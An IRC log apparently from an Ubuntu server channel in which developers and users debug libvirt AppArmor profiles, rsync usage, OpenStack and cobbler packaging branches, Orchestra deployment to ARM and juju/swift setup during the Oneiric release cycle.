<rbasak> /etc/apparmor.d/libvirt/libvirt-fa79d894-ae96-3ac2-6aa8-1a9ef5f96804 includes /etc/apparmor.d/libvirt/libvirt-fa79d894-ae96-3ac2-6aa8-1a9ef5f96804.files - should I be editing /etc/apparmor.d/libvirt/libvirt-fa79d894-ae96-3ac2-6aa8-1a9ef5f96804 or/etc/apparmor.d/libvirt/libvirt-fa79d894-ae96-3ac2-6aa8-1a9ef5f96804.files?
<jdstrand> the former. .files gets overwritten
<jdstrand> rbasak: when you have updated the file, can you paste it in paste.ubuntu.com?
<rbasak> OK. Should I stick those lines before or after the existing includes?
<jdstrand> rbasak: doesn't matter. typically after
<rbasak> http://paste.ubuntu.com/697924/
<rbasak> You're going to ask me to retry creating the instance, aren't you? That could be interesting.
<jdstrand> rbasak: ok, so if you shutdown the machine and start it, will instance-00000003 change to something else like instance-00000004?
<rbasak> Yeah that's the kind of thing I'm worried about
<rbasak> nova has left the old xml lying about
<rbasak> I could try virsh on that
<jdstrand> rbasak: please try with virsh
<rbasak> error: operation failed: domain 'instance-00000003' already exists with uuid fa79d894-ae96-3ac2-6aa8-1a9ef5f96804
<rbasak> OK so I can just stop and start with virsh perhaps
<jdstrand> yes, please use virsh
<jdstrand> if this isa  disposable vm:
<jdstrand> virsh destroy ...
<jdstrand> virsh start ...
<uvirtbot> New bug: #860629 in postfix (main) "package postfix (not installed) failed to install/upgrade: subprocess new pre-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/860629
<jdstrand> rbasak: let me know when the vm is running
<CluelessPerson> if I want to copy the contents of a directory, into another directory
<CluelessPerson> will this work?
<CluelessPerson> rsync -r $minecraft_path $ramdisk_path
<CluelessPerson> and the paths do NOT have slashes
<CluelessPerson>  .
<CluelessPerson>  /
<rbasak> OK, virsh list --all showed me the machine as shutdown (or something, my scrollback's gone), so I ran virsh start instance-00000003
 * RoyK honors CluelessPerson of his nick
<rbasak> That seems to have worked. virsh list now says running, lsof shows that qemu has the fifo running and it seems to be writing the console as get_console_output seems to work
<jdstrand> rbasak: can you do 'virsh dominfo instance-00000003'
<jdstrand> rbasak: and any apparmor denials?
<CluelessPerson> RoyK,  It has different functionality depending on how it's run
<rbasak> http://paste.ubuntu.com/697925/
<CluelessPerson> RoyK,  rsync insists on copying the directory into the directory prior to the one I give it, or directory/..  ?WTF
<RoyK> CluelessPerson: rsync somedir somewhere will copy somedir into somewhere/, rsync somedir/ somewhere will copy the _contents_ of somedir into somewhere/
<rbasak> No further denials
<jdstrand> rbasak: any apparmor denials after doing 'virsh start?
<CluelessPerson> rsync also tends to copy the ENTIRE source folder into the the destination   rsync source/ destination/   winds up with  destination/source
<rbasak> No, just status profile_load/profile_remove
<jdstrand> \o/
<jdstrand> rbasak: perfect. thanks! :)
<jdstrand> rbasak: feel free to remove those lines from /etc/apparmor.d/libvirt/libvirt-fa79d894-ae96-3ac2-6aa8-1a9ef5f96804
<jdstrand> rbasak: the next upload of libvirt should have this all adjusted so they are added to .files automatically
<CluelessPerson> RoyK, I keep winding up with files in destination/..
<CluelessPerson> or the directory just before destination
<RoyK> CluelessPerson: do some tests - you'll find out
<CluelessPerson> RoyK, I have.
<rbasak> jdstrand: awesome, thanks!
<RoyK> if you're paranoid, rsync somedir/. newdir/ and the contents of somedir will appear in newdir
<CluelessPerson> RoyK, rsync -r $ramdisk_path/ $minecraft_path
<RoyK> rsync -r $ramdisk_path/. $minecraft_path
<RoyK> just to make sure it only transfers the contents.......
<RoyK> add a --delete to that if you want to remove files already on the target that you don't want
<smoser> zul, what is the packaging branch for glance that i should work off of to fix issues in 11.10?
<smoser> lp:ubuntu/oneiric/glance is ahead of lp:~ubuntu-server-dev/glance/diablo
<CluelessPerson> RoyK,  OMG, I think it might be working now. >.<
<CluelessPerson> RoyK, And you seriously don't remember me? :p
<CluelessPerson> RoyK, you've helped me before. :D
<zul> smoser: yeah i need to get those in sync gimme a sec
<RoyK> CluelessPerson: I do remember you :)
<RoyK> one must be rather clueless to not remember that nick :P
<eseyden> What is a good book for setting up 10.04 as a IPsec, LT2P, Keberos, OpenLDAP server on EC2.  I've been looking for information on Juju and Charms, A whole enterprise VPC ubuntu setup running a java / mysql cluster intranet is my goal.
<CluelessPerson> RoyK, Again, it produced files in the directory before the directory it's supposed to.
<CluelessPerson> wtf.
<CluelessPerson> rdisk stuff/ storage
<Potatoe> I installed a basic setup with cfengine 3 on 3 servers. I call cf-execd -F from cron every 5 minutes. When called manually, everything works, when called from cron new packages are not installed. What is it about calling from cron that is preventing package installation?
<CluelessPerson> and it winds up in stuff/ storage/.. ???
<CluelessPerson> I mean rsync
<CluelessPerson> RoyK, Well, the world returns correctly and works...
<CluelessPerson> RoyK, ...but for some file files are appearing outside the directory they're supposed to be saved too
<uvirtbot> New bug: #860655 in logwatch (main) "Link to COPYRIGHT file is broken" [Undecided,New] https://launchpad.net/bugs/860655
<capeta> how do i configure my system locales?
<CluelessPerson> RoyK, I guess it's not rsync that's saving to the home directory
<CluelessPerson> RoyK, I think the server is saving in the homedirectory
<uvirtbot> New bug: #860652 in glance (main) "glance post-installation script failed, Syntax error: "fi" unexpected (dup-of: 857021)" [Critical,In progress] https://launchpad.net/bugs/860652
<pmatulis> capeta: try adding the locales to /var/lib/locales/supported.d/local (one per line) and running 'sudo dpkg-reconfigure locales'
<smoser> zul, so what would be the expected process to keep lp:~ubuntu-server-dev/glance/diablo ahead of lp:ubuntu/oneiric[-updates]/glance
<smoser> or, put another way, what is the right packaging branch?
<zul> ~ubuntu-server-dev/glance
<zul> smoser: that was a 0-hour bug fix that didnt get push
<CluelessPerson> RoyK, I'm not gay, I'm definitely straight, but thank you for your help you sexy prime beast of a respectable man you. :D
<smoser> so just so i can set that straight in my head, why would someone know that ?
<zul> smoser: im in the middle of updating the debian/control
<smoser> k
<zul> smoser: and i should probably do a wiki page :)
<capeta> pmatulis: but my system has a lot of locales supported that aren't listed in /var/lib/locales/supported.d/local
<smoser> zul, README.source would also be a good place.
<zul> smoser: yeah that needs to be updated
<zul> the README.source tells you right now how to do a release
<zul> aka dch --release && debcommit --release ; bzr bd -S ; dput ; bzr push
<pmatulis> CluelessPerson: ?
<m_tadeu> hi...I'd like an opinion...which jabber server you guys recommend and why?
<jdstrand> Daviey: ok, I have a patch that I believe is the *one*. I am now testing it out with qrt
<capeta> pmatulis: oh, they are in /var/lib/locales/supported.d/en =]
<capeta> ty
<smoser> ok. zul  i have a change to push to the oneiric glance branch
<smoser> whatever that is.
<zul> smoser: what is it?
<smoser> so can i do that now or should i wait for you to be done playing in debian/control
<smoser> http://paste.ubuntu.com/697949/
<zul> smoser: go ahead just make sure the changelog is set to UNRELEASED
<CluelessPerson> pmatulis, lol, I've been very frustrated lately with this script, it's finally working
<CluelessPerson> ripping my hair out
<zul> smoser: good catch got right ahead
<smoser> zul, ok. pushed up rev 69.
 * zul goes back to cobbler
<pmatulis> CluelessPerson: er, oookay, but, 'sexy prime beast'?
<CluelessPerson> pmatulis, RoyK   And the reason those extranenous files were being made, is because the user was running a command which apparently just places the files it makes in the directory the user runs the beforementioned command from
<CluelessPerson> RoyK, Thus, doing "as_user run java -jar blah blah" would create extra files in the home dir
<CluelessPerson> RoyK, Fixed with as_user "cd ramdisk && java -jar blah start"
<CluelessPerson> thus, running it from the ramdisk directory, where the files all should be run
<zul> Daviey: so cobbler...i was checking yesterday and there are some interesting things like cobbler buildiso support now has ubuntu and debian support and there are a couple of bug fixes and our snapshot is quite old will i be able to get a FFE once its tested
<CluelessPerson> pmatulis, I can be straight and still recognize the quality of another guy.
<CluelessPerson> pmatulis, I'm quite comfortable with my sexuality
<smoser> zul, what are you saying !
<smoser> you're not really possibly suggesting we should switch version of cobbler
<smoser> are you?
<zul> smoser: no im saying we should update the version we have in the archive its like 3 months old
<smoser> in P series
<zul> ok nm then
<Daviey> zul: Really depends on the level of testing.
<Daviey> It's universe, but a core part of Orchestra.
<smoser> no
<smoser> i tdoesnt matter on the level of testing
<Daviey> zul: If you were to create a package, do some testing - and see if RoAkSoAx can throw it onto the work they are doing, that would add confidence
<smoser> we're supposed to ship a working product based on it in 2 weeks and 2 days.
<smoser> why would we do this ?
<smoser> what possible value does it bring ?
<Daviey> smoser: Yes, we have a random upstream snapshot.. If trunk is bug fixes only, then it makes sense
<Daviey> Not having looked at the git log, i can't really add more comment.
<smoser> we dont have enough time to test the stuff we have already uploaded
<smoser> why would we want to test new stuff
<smoser> we have a random upstream snapshot that is known to work
<Daviey> smoser: it depends what 'new' is.
<smoser> i'll take that over random upstream release that is not known to work.
<Daviey> wait, zul - what is buildiso support?  That was always there, wasn't it?
<Daviey> zul: can you generate a git log?
<zul> Daviey: basically allows you to build an iso of your system
<zul> Daviey: sure
<jamespage> I agree with smoser: we have something that we know works - why take the risk now?
<jamespage> if we have specific bugs we are seeing that cherry pick them from the new release into the oneiric version
<zul> ok ok
<Daviey> jamespage: What i am saying, is that lets look at the git log - then we have facts.
<uvirtbot> New bug: #845788 in glance "update_image in glance.client doesn't add content-length so the swift backend can't chunk" [High,In progress] https://launchpad.net/bugs/845788
<Daviey> Should i just do it myself, before we all jump on a bandwagon one way other the other, without facts?
 * jamespage goes for coffee before the ubuntu-server team meeting in #ubuntu-meeting
<smoser> Daviey, we are post beta
<smoser> we have long since passed the point where arguments start with "why not?"
<smoser> if you believe that oneiric is simply crap that we shove out so that we can get testing to make 12.04 reasonable, then we can just say that.
<Daviey> smoser: I am saying, lets look at the damn log.
<smoser> and i have a whole lot more crack to pull in then.
<Daviey> *sigh*
<zul> Daviey: http://pastebin.ubuntu.com/697972/
<kirkland> mtaylor: zul: hey guys ... negronjl and iamfuzz are trying to get keystone working;  they have a few changes to the Ubuntu keystone package
<kirkland> mtaylor: zul: it seems that Oneiric's keystone package is missing some dependencies, and needs a configuration
<zul> kirkland: would one of them be a configuration file
<kirkland> mtaylor: zul: negronjl and iamfuzz are working on the fixes
<zul> kirkland: well when they have a branch point me at it then
<kirkland> mtaylor: zul: which is the correct branch they should work off of?  it seems that lp:ubuntu/keystone is maybe missing some stuff
<zul> kirkland: gimme a sec
<kirkland> zul: k
<zul> https://code.launchpad.net/~openstack-ubuntu-packagers/keystone/diablo
<kirkland> negronjl: ^
<kirkland> zul: thanks
<kirkland> zul: what is this?
<zul> its the branch we share with upstream
<kirkland> zul: cool, thanks;   do you have an upload pending?
<kirkland> zul: we were making some of those same fixes
<zul> kirkland:  probably tomorrow
<kirkland> zul: eek;  we're blocking on a broken keystone here at our sprint
<kirkland> zul: do you have a ppa package we can test in the meantime?
<zul> kirkland: http://launchpad.net/keystone probably
<kirkland> zul: any chance we can get this uploaded today, so that it can make it through the queue and have a build tomorrow, so that we can have packages to work from tomorrow?
<kirkland> zul: we can help you test it
<Daviey> kirkland: keystone being in universe, and a non-core project wasn't our focus for this cycle.
<zul> kirkland: sure
<Daviey> patches welcome :)
<kirkland> Daviey: understood;  we have changes;  we made some of the same changes zul made, in fact
<zul> but whats "broken" besides missing configuration files
<kirkland> Daviey: we're just trying to sync up and reduce duplication of effort
<kirkland> negronjl: ^ ?
<negronjl> zul:  Where is the code for the branch that you pointed me to ?
<zul> negronjl: its a bzr branch
<kirkland> Daviey: it appears that lp:ubuntu/keystone and the upstream package branches are out of sync and we're trying to figure out what's what
<koolhead17> hi all
<zul> kirkland: dont use lp:ubuntu/keystone
<zul> use the url i just pasted
<negronjl> zul, Daviey:  I branched lp:ubuntu/oneiric/keystone.  Should I be pulling from somewhere else ?
<zul> kirkland/negronjl: this one https://code.launchpad.net/~openstack-ubuntu-packagers/keystone/diablo
<negronjl> zul/Daviey:  I'll pull from the branch and will work with it and test it.
<zul> k
<Static> Hi, I've setup Ubuntu Server 10.10 on a laptop, however it seems to sleep if I leave it a while. How can I stop it from doing so?
<Daviey> kirkland: syncing up during our meeting isn't the best time :)
<woody_> Hi
<uvirtbot> New bug: #860716 in nova (main) "armel cloud-images fail to startup fully with nova-compute on armel" [Undecided,New] https://launchpad.net/bugs/860716
<woody_> Anyone here know anything about westell port forwarding for a ubuntu webserver
<jamespage> zul: ^^ thats the one
<zul> jamespage: thanks
<Daviey> hggdh: will you be able to help test the non-test case things?
<hggdh> Daviey: er, confused by the question above
<Daviey> utlemming: well timed meeting!
<zul> Daviey: i just uploaded a new version of keystone with a couple of bug fixes can you let it through
<Daviey> zul: will smoke it afer this
<zul> negronjl/kirkland: i just uploaded a new keystone it needs a FFE fyi
<koolhead17> zul: let me know if you want me to test keystone
<koolhead17> i installed from github and has to add 10 odd pkges along with
<negronjl> zul: Can you point me to the branch?
<lynxman> zul: we're working on it at the same time dude, ethernet collision ;)
<lynxman> zul: could you please hold your horses on the FFe so we can add our patch as well? Maybe it was the same as yours
<zul> lynxman: got a debdiff?
<lynxman> zul: not yet! We're working on it :)
<zul> negronjl/lynxman: https://code.launchpad.net/~openstack-ubuntu-packagers/keystone/diablo
<_cb> In the windows world AD is used to manage the systems. From what I have read LDAP + KERBEROS + SAMBA will provide AD like functionality. Is there another, better, way?
<zul> Daviey: can you nack the keystone upload please i got a new one coming later
<Daviey> zul: k
<Daviey> jdstrand: So the MIR for cobbler-enlist.. I'm asking for the source and -udeb to be in main, not the optional binary package which is fine for universe.
<Daviey> the -udeb will only ever run in a volatile env, so the security implications would seem to be minimal.
<Daviey> Am i wrong?
<Daviey> I suppose someone could send malformed preseed, and then the udeb would execute arbitrary code.
<Daviey> Being on a clean system, the impact would seem to be low.
<jdstrand> Daviey: I think I'd like to have a closer look after all. is this required for oneiric?
<Daviey> kirkland: zul is prepairing one more upload for keystone, how does that fit with your plans?
<kirkland> Daviey: can he merge negronjl's latest fixes when he does that?
<Daviey> jdstrand: Sadly, yes
<Daviey> jdstrand: sorry for being an ass.
<zul> kirkland: yes
<kirkland> zul: thanks
<Daviey> cjwatson: I am write in saying there is a potential for executing arbitrary code with cobbler-enlist, if the preseed contains escaped string; it is then executed at the end of the postinst - right?
<skrite> i have server 11.04 on a box with hot-swapable scsi drives. I am wanting to clone one, but i don't know how to find it once i plug it in.  i used to use tail -f /var/log/messages
<skrite> doesn't work anymore
<Daviey> jamespage: Can you comment on:
<jdstrand> Daviey: fyi, uploaded fix for bug #832507
<uvirtbot> Launchpad bug 832507 in nova "console.log grows indefinitely" [High,In progress] https://launchpad.net/bugs/832507
<jdstrand> Daviey: looking at cobbler-enlist now
<SpamapS> skrite: /var/log/syslog
<Daviey> +    - debian/mail-stack-delivery.postinst: drop -n flag from dovecot deliver
<Daviey> +      command in postfix configuration.
<Daviey> why?
<jdstrand> obviously for the libvirt bit :)
<Daviey> jamespage: I'm sure it has good reasoning :)
<Daviey> jdstrand: I saw it in the queue, waiting on the diff!  Really appreciate that!
 * jdstrand nods
<jdstrand> I also sent it upstream
<Daviey> \o/
<skrite> SpamapS: thanks
<martyn> What alternatives are there for IPMI?
<skrite> SpamapS looks like syslog is not seeing when i pull a SCSI drive out
<skrite> would it need to be formatted ?
<SpamapS> skrite: you should see the block device
<SpamapS> skrite: you can also just look at /dev/sd* .. udev should be creating those nodes
<skrite> SpamapS like the /dev/sd#
<Daviey> kirkland: is orchestra 2.15 not 'released' with this upload?
<Daviey> kirkland: looking at the upstream changelog
<kirkland> Daviey: this is 2.16
<Daviey> upstream changelogs which mirror debian/changelog confuse me :)
<martyn> Dustin, do I need anything more than is in the current Oneric repositories to make Orchestra work on arm?
<Daviey> kirkland: +orchestra (2.16) unreleased; urgency=low
<martyn> (I understand that I need an x86 server to launch -onto- arm at the moment..)
<kirkland> martyn: no idea, really
<Daviey> martyn: That shouldn't be the case.
<Daviey> martyn: testing appreciated.
<kirkland> Daviey: where is this?
<martyn> Daviey: We're looking at it now.. will get back to you with results
<Daviey> kirkland: +++ orchestra-2.16/ChangeLog
<skrite> SpamapS:  does the drive need to be formatted?
<martyn> kirkland: Thx
<kirkland> martyn: orchestra currently only auto-imports x86_64 and i386
<kirkland> martyn: so you might need to import armel too
<Daviey> martyn: cool
<kirkland> martyn: that's configurable, i think
<kirkland> martyn: see: /usr/sbin/orchestra-import-isos
<martyn> kirkland: Might be, Trevor will look at it I'm sure
 * martyn is currently struggling with his QEMU environment ... *sigh*
<Daviey> martyn: is we the big C btw?
<martyn> Daviey: Correct.
<martyn> Daviey: I'm supposed to be working on EDAC at the moment, but I have some spare cycles and need a break .. so I'm looking at orchestra
<kirkland> Daviey: that ChangeLog is auto generated by my release-build script
<Daviey> kirkland: +    os.system('sudo cobbler system add --name="%s.canonical.com" --mac-address="%s" --ip-
<Daviey> kirkland: "%s.canonical.com" ?
<kirkland> Daviey: i should change the way that happens, i reckon
<kirkland> Daviey: uh..... RoAkSoAx ^
<Daviey> martyn: so we had an email from one of your chaps.. I didn't respond as i thought others had covered it.
<martyn> Daviey: You should definitely respond .. your guidance helps us prioritize
<kirkland> Daviey: ugh... that should have been in a scratch or sandbox
<Daviey> martyn: I would like to make sure you don't hit bug 827705, supposidly fixed - but not tested by us AFAIK.
<uvirtbot> Launchpad bug 827705 in u-boot-linaro "PXE boot requests non-standard config filename" [Medium,Fix released] https://launchpad.net/bugs/827705
<kirkland> Daviey: it's in the source package, but not being shipped
<kirkland> Daviey: not installed in the binary
<kirkland> Daviey: this was a little helper script that RoAkSoAx wrote to help us auto import 40 something machines
<martyn> Daviey: Well, since we have the author(s) of pxe-u-boot in house, that shouldn't be too much of a stretch if we have to fix it
<Daviey> kirkland: well if it's an example 'upstream' script, that isn't installed then it should be ok
<martyn> Daviey: Forwarded the bug to J.Hobbs
<Daviey> martyn: Oh sure, but if we can get it fixed before release - it helps :)
<kirkland> Daviey: let me confirm ...
<kirkland> Daviey: by dpkg -c on the debs....
<kirkland> Daviey: confirmed, NOT shipped
<Daviey> kirkland: +        $source != 'localhost'  <-- Out of interest, if localhost6 is fired at it - what happens?
<Daviey> kirkland: sweet
<kirkland> Daviey: fyi, RoAkSoAx just removed ".canonical.com" and put a "domain" variable in place
<Daviey> oh cool
<kirkland> Daviey: in the rsyslog config?
<Daviey> kirkland: yeah
<Daviey> Does it DTRT
<zul> Daviey: can you ack glance and nova after nova has been uploaded
<martyn> Daviey: Just forwarded the bug to J.Hobbs
<martyn> he's aware now
<Daviey> martyn: cool
<kirkland> Daviey: thanks
<Daviey> zul: looking
<kirkland> Daviey: i have no idea, about localhost6... how would i test?
<zul> kirkland: logger command should be able to do it
<kirkland> zul: thanks
<adam_g> RoAkSoAx: did you ever find a way to fix this during installation? http://paste.ubuntu.com/698063/
<adam_g> kirkland: maybe you know? ^
<kirkland> Daviey: zul: can you guys poke us when the keystone package lands?
<zul> kirkland: sure
<zul> kirkland: im just in the middle of uploading a new glance/nova then will get the keystone after
<kirkland> adam_g: i think RoAkSoAx cleared the squid cache, if you're hitting this in orchestra
<kirkland> zul: awesome, you rock, man
<adam_g> kirkland: yeah, ive cleared it and refreshed the ISO to whats current
<kirkland> zul: cool, what's the glance/nova changes?
<RoAkSoAx> adam_g: yeah, clean the cache
<adam_g> RoAkSoAx: i did, just before booting.
<adam_g> will try again?
<RoAkSoAx> adam_g: werid, we have been runing without issues since yesterday
<zul> kirkland: bug fixes check http://code.launchpad.net/~ubuntu-server-dev
<RoAkSoAx> adam_g: in situations like those I have completely cleared the cache and sometimes even waited dfor a few hours b ecause might be the archives as well
<adam_g> RoAkSoAx: if i just stop squid and reinstall, will it fall back to non-caching?
<RoAkSoAx> adam_g: not exactly, you need to remove "orchestra_proxy" snippet frm the preseed
<zul> Daviey: nova should be there
<Daviey> cool
<martyn> Daviey: Just chatted w/ Jason, and he's aware and incorporated the pxe fixes...
<zul> Daviey: and now keystone
<adam_g> RoAkSoAx: ever see this after bootstrap?
<adam_g> http://paste.ubuntu.com/698089/
<RoAkSoAx> adam_g: uhmm i think i have but long time ago
<RoAkSoAx> but ws caused by another bug
<RoAkSoAx> adam_g: i haven't seen it now btw
<adam_g> RoAkSoAx: are you ugys using juju from the archive, or a custom branch?
<RoAkSoAx> adam_g: archive
<smoser> hallyn, http://paste.ubuntu.com/698090/ is the last stuff showin in 'tail -f /var/log/nova/*' when you euca-run-instances with https://gist.github.com/1169889
<RoAkSoAx> adam_g: from yesterdays' PPA
<RoAkSoAx> adam_g: what about you
<RoAkSoAx> fwereade: http://paste.ubuntu.com/698089/
<smoser> where the instance ip was 10.55.60.119
<adam_g> RoAkSoAx: not sure, let me try upgrading to whats current
<RoAkSoAx> adam_g: alright
<RoAkSoAx> adam_g: that seems like one of the old bugs we had fixed
<fwereade> RoAkSoAx, adam_g: doesn't immediately imply anything obvious to me I'm afraid :(
<hazmat> adam_g, that's on orchestra?
<fwereade> anything in the provisioning agent log?
<Daviey> martyn: cool!
<hazmat> effectively the initialize didn't succeed
<RoAkSoAx> hazmat: yeah but probably an old branch
<RoAkSoAx> hazmat: cause we havnet experienced that and we are yusing juju from yesterday's ppa build
<RoAkSoAx> if you still providing daily builds
<hazmat> we are
<RoAkSoAx> hazmat: so yes, yesterday's available package are working just find for us without errors
<hazmat> cool
<martyn> Daviey: On the earlier call w/ DavidM and company we were under the impression that Orchestra had gotten a once-over on ARM
<adam_g> hazmat: let me use something more current on the client side. ill let you know
<kirkland> Daviey: zul: has anyone on your team tested Orchestra deploying to ARM?
<zul> kirkland: cobbler is as far as people got as far as i know
<martyn> (and it's okay if the deployment server is x86, what's important is that it deploys _to_ arm this round)
<kirkland> zul: cool -- who tested cobbler-deploying-ubuntu-on-arm?
<kirkland> RoAkSoAx has?
<zul> RoAkSoAx wrote it and jamespage tested it
<kirkland> martyn: okay ... so, cobbler does most of orchestra's hard work, and that has been verified to work with ARM
<martyn> zul: Any dox on external wiki on what they had to do?
<RoAkSoAx> kirkland: yeah cobbler ships a preseed for arm, but it has to be changed because at a certain point it wouldn't deploy to SD card anymore so you had to use a USB as sda and tweak the preseed
<kirkland> martyn: orchestra itself might need some minor tweaks
<martyn> zul : So we can replicate it?
<zul> martyn: not sure im there is a pad about it lemme see
<martyn> Danke
<RoAkSoAx> zul: there is
<zul> RoAkSoAx: url?
<RoAkSoAx> zul: looking
<hallyn> smoser: not sure what you're asking
<dejuren> zaid_h_: ping
<RoAkSoAx> zul: think they are at my computer at home
<zul> lemme check
<hallyn> smoser: right now i think my debugging is causing bugs :)
<martyn> RoAkSoAx: When you find it, email martin@calxeda.com?
<zul> martyn: try this: http://pad.ubuntu.com/cobbler-arm
<zul> RoAkSoAx: luckily i never delete my email :)
<martyn> RoAkSoAx: We're going to try to replicate and test using our server platform
<RoAkSoAx> martyn: http://pastebin.ubuntu.com/698093/ that's what we did but we need to change the preseed
<martyn> zul : Link is good.  I'm forwarding to Trevor
<RoAkSoAx> martyn: but that document doesn't reflect fixes done in u-boot for pxe'ing
<RoAkSoAx> but shoudln't affect
<martyn> RoAkSoAx: We wrote the PXE code for u-boot, so it shouldn't phase us much :)
<RoAkSoAx> martyn: if you see I had to mv /var/lib/tftpboot/pxelinux.cfg/01-aa-bb-cc-dd-ee-ff /var/lib/tftpboot/pxelinux.cfg/AA-BB-CC-DD-EE-F
<martyn> and we've picked up the u-boot patches from the bug and incorporated them
<RoAkSoAx> martyn: but that's now fixed
<smoser> hallyn, i'm not asking.
<smoser> i was just debugging why that stuff was failing
<smoser> and 'ip route del <important route out>' is not good
<smoser> :)
<zastaph> it seems that openssh-server generates an id_rsa .. but I already used that for connecting as a client to another ubuntu-server
<zastaph> i thought id_rsa was for the private key
<Daviey> RoAkSoAx: in cobbler, server name is a unique field, right?
<hallyn> smoser: oh, i see
<hallyn> smoser: why on earth would it do that :)
<smoser> yeah, so your suspicion was correct.
<smoser> id ont know. digging on that.
<smoser> and it didn't *used* to.
<smoser> i suspect its trying to add a bridge and put eth0 behind it
<adam_g> and move the IP of eth0 to the bridge
<adam_g> and the gateway
<adam_g> https://bugs.launchpad.net/nova/+bug/855210
<uvirtbot> Launchpad bug 855210 in nova "unable to boot instances w/ DHCP (dnsmasq 2.58)" [Critical,Fix released]
<adam_g> dont think that bug fix is the source of those changes, but it goes one step further and rearranges the order of the addresses
<adam_g> hazmat: updating to whats in the ppa fixed that. i think we were bootstrapping with some out of date tree, and units were coming up running trunk
<lynxman> adam_g: ping
<adam_g> lynxman: here
<hazmat> adam_g, cool
<lynxman> adam_g: hey, we're still having issues with the swift simple auth, do you have 5 mins during this hour to give us a hand? :)
<adam_g> lynxman: yea, waiting on hw to provision at the moment
<lynxman> adam_g: cool
<iamfuzztoo> adam_g, ubuntu@ec2-50-17-108-209.compute-1.amazonaws.com <-- proxy
<iamfuzztoo>   1: {dns-name: ec2-107-20-100-64.compute-1.amazonaws.com, instance-id: i-fc67089c}
<iamfuzztoo>   2: {dns-name: ec2-50-17-108-209.compute-1.amazonaws.com, instance-id: i-cc6708ac}
<iamfuzztoo>   3: {dns-name: ec2-174-129-49-81.compute-1.amazonaws.com, instance-id: i-d0620db0}
<iamfuzztoo>   4: {dns-name: ec2-50-17-52-93.compute-1.amazonaws.com, instance-id: i-d6620db6}
<smoser> hallyn, http://paste.ubuntu.com/698109/
<smoser> thats where i get now after a few tweeks
<hallyn> smoser: and it actually comes up?  Is that uncaught exception spurious?
<smoser> no
<smoser> instance does not come up
<smoser> and not spurious that i can tell
<smoser> (have not tried reboot)
<smoser> i just pushed the change that will let you get to that point
<hallyn> thx
<hallyn> being able to move back to an instance might be helpful.  I think I'm currently having the same error (on my local node) as you're seeing fwiw.  not sure though
<smoser> but due to some recent changes 'euca-run-instances --instance-type m1.tiny' is recommended.
<hallyn> why?
<smoser> inside
<smoser> we run out of space on /
<hallyn> ok
<smoser> very quickly
<hallyn> eh. sometimes i hate me
<hallyn> overwrote rc
<iamfuzztoo> adam_g, ubuntu@ec2-50-19-161-52.compute-1.amazonaws.com
<iamfuzztoo> we're still seeing the same error despite changing the block device to xvdb
<jamespage> zul, martyn, RoAkSoAx: I made a few refinements to RoAkSoAx original email - http://pad.ubuntu.com/arm-server-netboot
<martyn> jamespage: thx
<martyn> bookmarked and forwarded to J.hobbs
<adam_g> iamfuzztoo: just a sec
<adam_g> iamfuzztoo: can you pastebin 'juju stauts' ?
<adam_g> *status
<iamfuzztoo> adam_g, k, it may be because I didn'tprovide the full path
<iamfuzztoo> adam_g, I'm gonna add different exit codes for the different error cases to better track it down
<adam_g> iamfuzztoo: for whatever reason, the storage nodes arent making into the ring configuration. can i get access to those nodes as well?
<iamfuzztoo> adam_g, yep, one sec
<iamfuzztoo> adam_g,   1: {dns-name: ec2-50-16-138-51.compute-1.amazonaws.com, instance-id: i-c64629a6}
<iamfuzztoo>   2: {dns-name: ec2-50-19-161-52.compute-1.amazonaws.com, instance-id: i-dc4629bc}
<iamfuzztoo>   3: {dns-name: ec2-50-19-150-63.compute-1.amazonaws.com, instance-id: i-d65f30b6}
<iamfuzztoo>   4: {dns-name: ec2-107-20-58-35.compute-1.amazonaws.com, instance-id: i-b05f30d0}
<adam_g> iamfuzztoo: where are you guys running the juju client? is there any way for me to share a screen there?
<iamfuzztoo> adam_g, just running it from my laptop here...
<adam_g> iamfuzztoo: okay one sec
<iamfuzztoo> adam_g, lynxman has suggested teamviewer
 * SpamapS was playing with Google Hangouts w/ Extras .. it includes sharing screens
<lynxman> SpamapS: does it work fine? :)
<adam_g> iamfuzztoo: you guys are installing from trunk (essex), we should be testing against diablo/archive. can you set your config to 'swift-release: distro' to run that version instead?
<SpamapS> lynxman: yes its really good actually
<SpamapS> I believe its in limited beta tho
<adam_g> it looks like the exit values of swift-ring-builder may now actually return 0 for success, 1 for failure instead of the other way which is whath the formula is looking for
<lynxman> adam_g: you kidding about essex right?
<warzauwynn> SpamapS: i don't see a mention of limited beta: http://www.google.com/tools/dlpage/res/talkvideo/hangouts/
<adam_g> lynxman: kidding about what?
<SpamapS> warzauwynn: its in the "with extras" hangout.. I believe its invite only at the moment.
<warzauwynn> SpamapS: i see.  well i found that link from http://google.com/?q=google+hangouts but i could definitely be wrong, haven't actually used it yet. i just installed the plugin with no problems though.
<SpamapS> warzauwynn: its really, really nice, w/o the extras..
<SpamapS> warzauwynn: just being able to efficiently have a group video chat is huge
<lynxman> Daviey: got rabbitmq 2.6.1 packaged, a bit too late for oneiric right?
<adam_g> lynxman: are those available in a PPA somewhere? id like to see if rabbitmqctl still segfaults
<lynxman> adam_g: https://launchpad.net/~lynxman/+archive/ppa
<Daviey> lynxman: i think so TBH.
<Daviey> sounds like a PPA job lynxman
<lynxman> Daviey: was afraid so, had to ask anyway :)
<Daviey> :)
<kirkland> lifeless: howdy!  around?
<kirkland> lifeless: care to re-review our orchestra/squid conf?
<lifeless> kirkland: sure
<kirkland> lifeless: http://bazaar.launchpad.net/~orchestra/orchestra/trunk/revision/258
<kirkland> lifeless: that's the change I just committed
<kirkland> lifeless: i think the bug was s/Package/Packages/
<kirkland> lifeless: however, working with agy, I changed that one liner to 3 lines he gave me from millbank's squid
<lifeless> you say '    - Do *not* cache [Releases|Packages|Sources] lists for Ubuntu archives'
<lifeless> but your patch will cache
<iamfuzztoo> adam_g, you are correct, I updated the error codes to determine where it is failing, and it is indeed at add_to_ring
<kirkland> lifeless: my patch caches them for up to 1 day?
<lifeless> kirkland: IFF they have no explicit cache metadata
<lifeless> kirkland: oh and the 100% is a fraction of *age*, not of the min->max interval
<lifeless> kirkland: what are you trying to accomplish here ?
<lnx1> Hello all, yesterday on this channel I was recommended an application called 'Timeoutd' which logs out users after a specified amount of time on an Ubuntu PC. If anyone knows of this program, does anyone know how to edit the Warning message?
<adam_g> iamfuzztoo: i just confirmed as well, the exit values have changed at some point between swift 1.4.3-0ubuntu1 and what you're installing from trunk.
<iamfuzztoo> adam_g, we cahnged the value you gave us and still the same issue
